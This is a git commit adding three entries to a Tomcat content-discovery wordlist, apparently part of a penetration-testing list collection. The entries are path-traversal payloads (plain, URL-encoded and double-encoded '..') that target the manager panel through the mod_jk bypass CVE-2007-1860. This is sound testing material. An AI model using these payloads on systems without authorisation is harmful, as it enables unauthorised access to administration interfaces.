Support for CVE-2007-1860 mod_jk double encoding

Added paths that will check access control bypass using double encoding (CVE-2007-1860) that could allow a remote user to access Tomcat's administration panel. Based on the scenario demonstrated on https://pentesterlab.com/exercises/cve-2007-1860/course
2016-07-28 14:10:42 +02:00
parent c8741490de
commit fff5faa976
1 changed files with 3 additions and 0 deletions
--- a/Discovery/Web_Content/tomcat.txt
+++ b/Discovery/Web_Content/tomcat.txt
@@ -21,6 +21,9 @@ examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp
 examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp
 examples/servlet/snoop
 examples/servlets/index.html
+examples/../manager/html
+examples/%2e%2e/manager/html
+examples/%252e%252e/manager/html
 host-manager
 host-manager/add
 host-manager/host-manager.xml